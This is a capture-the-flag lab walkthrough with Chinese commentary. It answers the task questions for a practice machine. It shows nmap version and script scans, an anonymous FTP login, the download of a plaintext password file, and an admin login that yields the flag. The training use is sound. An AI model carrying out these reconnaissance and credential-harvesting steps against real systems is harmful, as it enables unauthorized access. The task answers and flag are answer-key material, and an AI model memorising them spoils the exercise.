# Task 1
Q:What nmap scanning switch employs the use of default scripts during a scan?
A: -sC
# Task 2
Q:What service version is found to be running on port 21?
┌──(root💀kali)-[~] | |
└─# nmap -sV -Pn -p21 10.129.1.15 | |
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:47 CST | |
Nmap scan report for 10.129.1.15 | |
Host is up (0.27s latency). | |
PORT STATE SERVICE VERSION | |
21/tcp open ftp vsftpd 3.0.3 | |
Service Info: OS: Unix | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds |
-sV 仅检测版本号-Pn 跳过 ping 扫描
A: vsFTPd 3.0.3
# Task 3
Q:What FTP code is returned to us for the "Anonymous FTP login allowed" message?
┌──(root💀kali)-[~] | |
└─# nmap -sC -Pn -p21 10.129.1.15 | |
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:50 CST | |
Nmap scan report for 10.129.1.15 | |
Host is up (0.51s latency). | |
PORT STATE SERVICE | |
21/tcp open ftp | |
| ftp-anon: Anonymous FTP login allowed (FTP code 230) | |
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist | |
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd | |
| ftp-syst: | |
| STAT: | |
| FTP server status: | |
| Connected to ::ffff:10.10.16.86 | |
| Logged in as ftp | |
| TYPE: ASCII | |
| No session bandwidth limit | |
| Session timeout in seconds is 300 | |
| Control connection is plain text | |
| Data connections will be plain text | |
| At session startup, client count was 3 | |
| vsFTPd 3.0.3 - secure, fast, stable | |
|_End of status | |
Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds |
第 9 行能看到允许匿名登录,响应码是 230
A:230
# Task 4
Q:What command can we use to download the files we find on the FTP server?
A:get
# Task 5
Q:What is one of the higher-privilege sounding usernames in the list we retrieved?
这个需要 ftp 登录进去,然后 get 文件下来,但是根据提示直接盲猜 admin 就可以了
A:admin
# Task 6
Q:What version of Apache HTTP Server is running on the target host?
┌──(root💀kali)-[~] | |
└─# nmap -sV -Pn 10.129.1.15 | |
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:55 CST | |
Nmap scan report for 10.129.1.15 | |
Host is up (0.62s latency). | |
Not shown: 998 closed tcp ports (reset) | |
PORT STATE SERVICE VERSION | |
21/tcp open ftp vsftpd 3.0.3 | |
80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | |
Service Info: OS: Unix | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 16.59 seconds |
第 9 行,十分明显,我这个直接列出了所有版本号,可以定点查询加参数 -p80
A:2.4.41
# Task 7
Q:What is the name of a handy web site analysis plug-in we can install in our browser?
A:wappalyzer
# Task 8
Q:What switch can we use with gobuster to specify we are looking for specific filetypes?
A: -x
# Task 9
Q:What file have we found that can provide us a foothold on the target?
A:login.php
# Flag
ftp 登录进去,下载密码文件
┌──(root💀kali)-[~] | |
└─# ftp 10.129.1.15 | |
Connected to 10.129.1.15. | |
220 (vsFTPd 3.0.3) | |
Name (10.129.1.15:root): anonymous | |
230 Login successful. | |
Remote system type is UNIX. | |
Using binary mode to transfer files. | |
ftp> ls | |
200 PORT command successful. Consider using PASV. | |
150 Here comes the directory listing. | |
-rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist | |
-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd | |
226 Directory send OK. | |
ftp> get allowed.userlist.passwd | |
local: allowed.userlist.passwd remote: allowed.userlist.passwd | |
200 PORT command successful. Consider using PASV. | |
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes). | |
226 Transfer complete. | |
62 bytes received in 0.00 secs (197.2211 kB/s) | |
ftp> exit | |
221 Goodbye. |
他这个第四个是 admin 的密码
┌──(root💀kali)-[~] | |
└─# cat allowed.userlist.passwd | |
root | |
Supersecretpassword1 | |
@BaASD&9032123sADS | |
rKXM59ESxesUFHAd |
直接用 admin 登录进去,得到 flag
flag: c7110277ac44d78b6a9fff2232434d16
